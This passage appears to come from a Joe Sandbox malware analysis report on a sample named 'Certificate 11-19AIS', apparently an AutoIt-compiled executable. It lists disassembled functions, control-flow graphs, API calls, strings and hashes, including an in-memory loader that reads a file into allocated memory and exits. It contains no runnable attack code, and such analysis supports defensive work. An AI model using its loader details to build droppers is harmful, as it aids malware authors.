                                                                              • Opcode ID: 374314499555407e442d68d2ded865b6a97012fe150541b0f3be686fc6e161ed
                                                                              • Instruction ID: 0f5be081a1bbdb942ac7b3d77635987151cca2fa6b4d79269bcf80abece1926f
                                                                              • Opcode Fuzzy Hash: 374314499555407e442d68d2ded865b6a97012fe150541b0f3be686fc6e161ed
                                                                              • Instruction Fuzzy Hash: 89C11AB1A0021DEADF15DFA4CD85EEEB7BDEF49310F0040AAF609E6251DB749A448F61
                                                                              Function 007B3F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 007B3F86
                                                                              • RegisterClassExW.USER32(00000030), ref: 007B3FB0
                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007B3FC1
                                                                              • InitCommonControlsEx.COMCTL32(?), ref: 007B3FDE
                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007B3FEE
                                                                              • LoadIconW.USER32(000000A9), ref: 007B4004
                                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007B4013
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                              • API String ID: 2914291525-1005189915
                                                                              • Opcode ID: 64d50a36c77d2b5bbdff071cf27e239b010f2750916186d147d4e764875964be
                                                                              • Instruction ID: 0863aeaf8b2e7e42d9d35c5decef6093e90a86b7c93e1c9a0b3a349e16a5cd95
                                                                              • Opcode Fuzzy Hash: 64d50a36c77d2b5bbdff071cf27e239b010f2750916186d147d4e764875964be
                                                                              • Instruction Fuzzy Hash: AD21C4B5914318AFDF00DFA8EC8DBCDBBB4FB18710F04461AF625A66A4D7B485848F91
                                                                              Function 007B3742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 961 7b3742-7b3762 963 7b37c2-7b37c4 961->963 964 7b3764-7b3767 961->964 963->964 967 7b37c6 963->967 965 7b3769-7b3770 964->965 966 7b37c8 964->966 970 7b382c-7b3834 PostQuitMessage 965->970 971 7b3776-7b377b 965->971 968 821e00-821e2e call 7b2ff6 call 7ce312 966->968 969 7b37ce-7b37d1 966->969 972 7b37ab-7b37b3 DefWindowProcW 967->972 1008 821e33-821e3a 968->1008 973 7b37d3-7b37d4 969->973 974 7b37f6-7b381d SetTimer RegisterWindowMessageW 969->974 978 7b37f2-7b37f4 970->978 976 821e88-821e9c call 7f4ddd 971->976 977 7b3781-7b3783 971->977 979 7b37b9-7b37bf 972->979 980 821da3-821da6 973->980 981 7b37da-7b37ed KillTimer call 7b3847 call 7b390f 973->981 974->978 983 7b381f-7b382a CreatePopupMenu 974->983 976->978 1000 821ea2 976->1000 984 7b3789-7b378e 977->984 985 7b3836-7b3840 call 7ceb83 977->985 978->979 993 821da8-821daa 980->993 994 821ddc-821dfb MoveWindow 980->994 981->978 983->978 989 821e6d-821e74 984->989 990 7b3794-7b3799 984->990 1001 7b3845 985->1001 989->972 996 821e7a-821e83 call 7ea5f3 989->996 998 7b379f-7b37a5 990->998 999 821e58-821e68 call 7f55bd 990->999 1002 821dcb-821dd7 SetFocus 993->1002 1003 821dac-821daf 993->1003 994->978 996->972 998->972 998->1008 999->978 1000->972 1001->978 1002->978 1003->998 1004 821db5-821dc6 call 7b2ff6 1003->1004 1004->978 1008->972 1012 821e40-821e53 call 7b3847 call 7b4ffc 1008->1012 1012->972
                                                                              APIs
                                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 007B37B3
                                                                              • KillTimer.USER32(?,00000001), ref: 007B37DD
                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 007B3800
                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007B380B
                                                                              • CreatePopupMenu.USER32 ref: 007B381F
                                                                              • PostQuitMessage.USER32(00000000), ref: 007B382E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                              • String ID: TaskbarCreated
                                                                              • API String ID: 129472671-2362178303
                                                                              • Opcode ID: c972ee8b243e115f397428a7a38a4ccd0880aa59bb677b1faddc96c205a4aeb7
                                                                              • Instruction ID: 83da1a58794f6b80ac6675185dae2f23ee1d447875d85e18a940ad2312e14456
                                                                              • Opcode Fuzzy Hash: c972ee8b243e115f397428a7a38a4ccd0880aa59bb677b1faddc96c205a4aeb7
                                                                              • Instruction Fuzzy Hash: 2A4125F5200295ABDF145F6CAC8EFFA3695FB50340F100129FA26D25A5DF68DED08762
                                                                              Function 007B3E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 007B3E79
                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 007B3E88
                                                                              • LoadIconW.USER32(00000063), ref: 007B3E9E
                                                                              • LoadIconW.USER32(000000A4), ref: 007B3EB0
                                                                              • LoadIconW.USER32(000000A2), ref: 007B3EC2
                                                                                • Part of subcall function 007B4024: LoadImageW.USER32(007B0000,00000063,00000001,00000010,00000010,00000000), ref: 007B4048
                                                                              • RegisterClassExW.USER32(?), ref: 007B3F30
                                                                                • Part of subcall function 007B3F53: GetSysColorBrush.USER32(0000000F), ref: 007B3F86
                                                                                • Part of subcall function 007B3F53: RegisterClassExW.USER32(00000030), ref: 007B3FB0
                                                                                • Part of subcall function 007B3F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007B3FC1
                                                                                • Part of subcall function 007B3F53: InitCommonControlsEx.COMCTL32(?), ref: 007B3FDE
                                                                                • Part of subcall function 007B3F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007B3FEE
                                                                                • Part of subcall function 007B3F53: LoadIconW.USER32(000000A9), ref: 007B4004
                                                                                • Part of subcall function 007B3F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007B4013
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                              • String ID: #$0$AutoIt v3
                                                                              • API String ID: 423443420-4155596026
                                                                              • Opcode ID: 4178b83880b62bf130901ff5afa41ac7606ee5af08d3df24481538a2864c92a3
                                                                              • Instruction ID: b947d357813711ffbb6499721bbe149bb5f59fd0e5e56afc3e4db6694ec93308
                                                                              • Opcode Fuzzy Hash: 4178b83880b62bf130901ff5afa41ac7606ee5af08d3df24481538a2864c92a3
                                                                              • Instruction Fuzzy Hash: 862156B0E00304ABCF10DFADEC4DA99BBF5FB44314F10452AE208A66A4D7758680DFA1
                                                                              Function 007DACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1025 7dacb3-7dace0 call 7d6ac0 call 7d7cf4 call 7d6986 1032 7dacfd-7dad02 1025->1032 1033 7dace2-7dacf8 call 7de880 1025->1033 1034 7dad08-7dad0f 1032->1034 1039 7daf52-7daf57 call 7d6b05 1033->1039 1036 7dad11-7dad40 1034->1036 1037 7dad42-7dad51 GetStartupInfoW 1034->1037 1036->1034 1040 7dad57-7dad5c 1037->1040 1041 7dae80-7dae86 1037->1041 1040->1041 1043 7dad62-7dad79 1040->1043 1044 7dae8c-7dae9d 1041->1044 1045 7daf44-7daf50 call 7daf58 1041->1045 1047 7dad7b-7dad7d 1043->1047 1048 7dad80-7dad83 1043->1048 1049 7dae9f-7daea2 1044->1049 1050 7daeb2-7daeb8 1044->1050 1045->1039 1047->1048 1055 7dad86-7dad8c 1048->1055 1049->1050 1056 7daea4-7daead 1049->1056 1052 7daebf-7daec6 1050->1052 1053 7daeba-7daebd 1050->1053 1057 7daec9-7daed5 GetStdHandle 1052->1057 1053->1057 1058 7dadae-7dadb6 1055->1058 1059 7dad8e-7dad9f call 7d6986 1055->1059 1060 7daf3e-7daf3f 1056->1060 1061 7daf1c-7daf32 1057->1061 1062 7daed7-7daed9 1057->1062 1064 7dadb9-7dadbb 1058->1064 1072 7dada5-7dadab 1059->1072 1073 7dae33-7dae3a 1059->1073 1060->1041 1061->1060 1067 7daf34-7daf37 1061->1067 1062->1061 1065 7daedb-7daee4 GetFileType 1062->1065 1064->1041 1068 7dadc1-7dadc6 1064->1068 1065->1061 1071 7daee6-7daef0 1065->1071 1067->1060 1069 7dadc8-7dadcb 1068->1069 1070 7dae20-7dae31 1068->1070 1069->1070 1074 7dadcd-7dadd1 1069->1074 1070->1064 1075 7daefa-7daefd 1071->1075 1076 7daef2-7daef8 1071->1076 1072->1058 1077 7dae40-7dae4e 1073->1077 1074->1070 1078 7dadd3-7dadd5 1074->1078 1080 7daeff-7daf03 1075->1080 1081 7daf08-7daf1a InitializeCriticalSectionAndSpinCount 1075->1081 1079 7daf05 1076->1079 1082 7dae74-7dae7b 1077->1082 1083 7dae50-7dae72 1077->1083 1084 7dade5-7dae1a InitializeCriticalSectionAndSpinCount 1078->1084 1085 7dadd7-7dade3 GetFileType 1078->1085 1079->1081 1080->1079 1081->1060 1082->1055 1083->1077 1086 7dae1d 1084->1086 1085->1084 1085->1086 1086->1070
                                                                              APIs
                                                                              • __lock.LIBCMT ref: 007DACC1
                                                                                • Part of subcall function 007D7CF4: __mtinitlocknum.LIBCMT ref: 007D7D06
                                                                                • Part of subcall function 007D7CF4: EnterCriticalSection.KERNEL32(00000000,?,007D7ADD,0000000D), ref: 007D7D1F
                                                                              • __calloc_crt.LIBCMT ref: 007DACD2
                                                                                • Part of subcall function 007D6986: __calloc_impl.LIBCMT ref: 007D6995
                                                                                • Part of subcall function 007D6986: Sleep.KERNEL32(00000000,000003BC,007CF507,?,0000000E), ref: 007D69AC
                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 007DACED
                                                                              • GetStartupInfoW.KERNEL32(?,00866E28,00000064,007D5E91,00866C70,00000014), ref: 007DAD46
                                                                              • __calloc_crt.LIBCMT ref: 007DAD91
                                                                              • GetFileType.KERNEL32(00000001), ref: 007DADD8
                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 007DAE11
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                              • String ID:
                                                                              • API String ID: 1426640281-0
                                                                              • Opcode ID: 4914d8ac004d687817f934fb9017f6d9f9470cffa4e5922796415dc0627e428e
                                                                              • Instruction ID: d79b39d5362cd9259cb48fcd656f70bb5b52a2eaae6aa08e0a3aaf36c70c8ab9
                                                                              • Opcode Fuzzy Hash: 4914d8ac004d687817f934fb9017f6d9f9470cffa4e5922796415dc0627e428e
                                                                              • Instruction Fuzzy Hash: 4681D2B1905345DFDB14CF68C8856A9BBF0BF45320B24426EE4AAAB3D1D738D842CB56
                                                                              Function 00EF2CB8 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1087 ef2cb8-ef2d66 call ef06d8 1090 ef2d6d-ef2d93 call ef3bc8 CreateFileW 1087->1090 1093 ef2d9a-ef2daa 1090->1093 1094 ef2d95 1090->1094 1101 ef2dac 1093->1101 1102 ef2db1-ef2dcb VirtualAlloc 1093->1102 1095 ef2ee5-ef2ee9 1094->1095 1096 ef2f2b-ef2f2e 1095->1096 1097 ef2eeb-ef2eef 1095->1097 1103 ef2f31-ef2f38 1096->1103 1099 ef2efb-ef2eff 1097->1099 1100 ef2ef1-ef2ef4 1097->1100 1104 ef2f0f-ef2f13 1099->1104 1105 ef2f01-ef2f0b 1099->1105 1100->1099 1101->1095 1106 ef2dcd 1102->1106 1107 ef2dd2-ef2de9 ReadFile 1102->1107 1108 ef2f8d-ef2fa2 1103->1108 1109 ef2f3a-ef2f45 1103->1109 1114 ef2f15-ef2f1f 1104->1114 1115 ef2f23 1104->1115 1105->1104 1106->1095 1116 ef2deb 1107->1116 1117 ef2df0-ef2e30 VirtualAlloc 1107->1117 1112 ef2fa4-ef2faf VirtualFree 1108->1112 1113 ef2fb2-ef2fba 1108->1113 1110 ef2f49-ef2f55 1109->1110 1111 ef2f47 1109->1111 1118 ef2f69-ef2f75 1110->1118 1119 ef2f57-ef2f67 1110->1119 1111->1108 1112->1113 1114->1115 1115->1096 1116->1095 1120 ef2e37-ef2e52 call ef3e18 1117->1120 1121 ef2e32 1117->1121 1124 ef2f77-ef2f80 1118->1124 1125 ef2f82-ef2f88 1118->1125 1123 ef2f8b 1119->1123 1127 ef2e5d-ef2e67 1120->1127 1121->1095 1123->1103 1124->1123 1125->1123 1128 ef2e9a-ef2eae call ef3c28 1127->1128 1129 ef2e69-ef2e98 call ef3e18 1127->1129 1135 ef2eb2-ef2eb6 1128->1135 1136 ef2eb0 1128->1136 1129->1127 1137 ef2eb8-ef2ebc CloseHandle 1135->1137 1138 ef2ec2-ef2ec6 1135->1138 1136->1095 1137->1138 1139 ef2ec8-ef2ed3 VirtualFree 1138->1139 1140 ef2ed6-ef2edf 1138->1140 1139->1140 1140->1090 1140->1095
                                                                              APIs
                                                                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00EF2D89
                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00EF2FAF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1318117167.0000000000EF0000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ef0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFileFreeVirtual
                                                                              • String ID:
                                                                              • API String ID: 204039940-0
                                                                              • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                              • Instruction ID: 3a362be103028bee912dbf3d63ca4c7b36e7a5badac28ad8de11fc12e281d440
                                                                              • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                              • Instruction Fuzzy Hash: 2AA1F671E0020DEBDB14CFA4C894BFEBBB5BF48304F209159E615BB280D7759A81CB54
                                                                              Function 007B49FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1196 7b49fb-7b4a25 call 7bbcce RegOpenKeyExW 1199 7b4a2b-7b4a2f 1196->1199 1200 8241cc-8241e3 RegQueryValueExW 1196->1200 1201 824246-82424f RegCloseKey 1200->1201 1202 8241e5-824222 call 7cf4ea call 7b47b7 RegQueryValueExW 1200->1202 1207 824224-82423b call 7b6a63 1202->1207 1208 82423d-824245 call 7b47e2 1202->1208 1207->1208 1208->1201
                                                                              APIs
                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 007B4A1D
                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 008241DB
                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0082421A
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00824249
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: QueryValue$CloseOpen
                                                                              • String ID: Include$Software\AutoIt v3\AutoIt
                                                                              • API String ID: 1586453840-614718249
                                                                              • Opcode ID: 4d0ddb40d3c4d878bff771266455f567bf163cc71e4a23354ed2a56e1a22dc84
                                                                              • Instruction ID: eb6e12ceb9ee71b4df71bddc846573dd9ed998a32751bfac295a8a640309b55a
                                                                              • Opcode Fuzzy Hash: 4d0ddb40d3c4d878bff771266455f567bf163cc71e4a23354ed2a56e1a22dc84
                                                                              • Instruction Fuzzy Hash: 43116D71600208FEEB04ABA4DD9AEEF7BACFF04744F004458B502E6191EA749E41D760
                                                                              Function 007B36B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1223 7b36b8-7b3728 CreateWindowExW * 2 ShowWindow * 2
                                                                              APIs
                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 007B36E6
                                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 007B3707
                                                                              • ShowWindow.USER32(00000000,?,?,?,?,007B3AA3,?), ref: 007B371B
                                                                              • ShowWindow.USER32(00000000,?,?,?,?,007B3AA3,?), ref: 007B3724
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CreateShow
                                                                              • String ID: AutoIt v3$edit
                                                                              • API String ID: 1584632944-3779509399
                                                                              • Opcode ID: 9651d226c5d22bf077a56d510d7100d3f04a1267521de316d2def792ac5665c5
                                                                              • Instruction ID: 859bb525443780c92c95c473fe74374b1b6c1000133881176645065c64b778f9
                                                                              • Opcode Fuzzy Hash: 9651d226c5d22bf077a56d510d7100d3f04a1267521de316d2def792ac5665c5
                                                                              • Instruction Fuzzy Hash: 3CF0DA716406D47AEB31676BAC0DE672E7DF7C6F24B00001EBA08A25B4C56548D9DAB1
                                                                              Function 00EF2A88 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 145fileCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1328 ef2a88-ef2bb4 call ef06d8 call ef2978 CreateFileW 1335 ef2bbb-ef2bcb 1328->1335 1336 ef2bb6 1328->1336 1339 ef2bcd 1335->1339 1340 ef2bd2-ef2bec VirtualAlloc 1335->1340 1337 ef2c6b-ef2c70 1336->1337 1339->1337 1341 ef2bee 1340->1341 1342 ef2bf0-ef2c07 ReadFile 1340->1342 1341->1337 1343 ef2c0b-ef2c45 call ef29b8 call ef1978 1342->1343 1344 ef2c09 1342->1344 1349 ef2c47-ef2c5c call ef2a08 1343->1349 1350 ef2c61-ef2c69 ExitProcess 1343->1350 1344->1337 1349->1350 1350->1337
                                                                              APIs
                                                                                • Part of subcall function 00EF2978: Sleep.KERNELBASE(000001F4), ref: 00EF2989
                                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00EF2BAA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1318117167.0000000000EF0000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ef0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFileSleep
                                                                              • String ID: FCMZTFF78INYO8VTDR6UCWW
                                                                              • API String ID: 2694422964-4154250320
                                                                              • Opcode ID: 9190138938cb9c21007523c057a652504bdb33fcff69a6f7a7e6b35d45cb1769
                                                                              • Instruction ID: 8730ccb9185a911c868a57154cffe29f5b1c7b2e17f399324cf25c32fbdd06ff
                                                                              • Opcode Fuzzy Hash: 9190138938cb9c21007523c057a652504bdb33fcff69a6f7a7e6b35d45cb1769
                                                                              • Instruction Fuzzy Hash: 95519070D0428CEAEF11DBA4C959BEEBBB8AF15304F104199E7487B2C1D7B90B44CBA5
                                                                              Function 007B51AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 007B522F
                                                                              • _wcscpy.LIBCMT ref: 007B5283
                                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 007B5293
                                                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00823CB0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                              • String ID: Line:
                                                                              • API String ID: 1053898822-1585850449
                                                                              • Opcode ID: 0d1eab804d4fd9d488dfeeb147d365110bfef71fcf6da1e3e3a55a06f954f7b2
                                                                              • Instruction ID: d9fa9325e4da0d82f337d318e87ce71cced6e67be375724ed101a49141d7d23d
                                                                              • Opcode Fuzzy Hash: 0d1eab804d4fd9d488dfeeb147d365110bfef71fcf6da1e3e3a55a06f954f7b2
                                                                              • Instruction Fuzzy Hash: E931EF71108744AFD721EB64EC4EFEE77E8BB44310F00451EF58982192EB78A688CB96
                                                                              Function 007B4139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007B41A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,007B39FE,?,00000001), ref: 007B41DB
                                                                              • _free.LIBCMT ref: 008236B7
                                                                              • _free.LIBCMT ref: 008236FE
                                                                                • Part of subcall function 007BC833: __wsplitpath.LIBCMT ref: 007BC93E
                                                                                • Part of subcall function 007BC833: _wcscpy.LIBCMT ref: 007BC953
                                                                                • Part of subcall function 007BC833: _wcscat.LIBCMT ref: 007BC968
                                                                                • Part of subcall function 007BC833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 007BC978
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                              • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                              • API String ID: 805182592-1757145024
                                                                              • Opcode ID: ce8dbfdf0a68e5511966270b32caef181e08537a9884bea0556a82a49de47cad
                                                                              • Instruction ID: 0430b6e12abdef975b0c6f4ceacfe8c4c782943d337b0dafc609417e6d8b4e41
                                                                              • Opcode Fuzzy Hash: ce8dbfdf0a68e5511966270b32caef181e08537a9884bea0556a82a49de47cad
                                                                              • Instruction Fuzzy Hash: 2B913C71910229EBCF04EFA4DC55AEDB7B4FF14310B104429F916E7291DB789A45CB50
                                                                              Function 007B4A30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON
                                                                              Download Yara Rule
                                                                              APIs
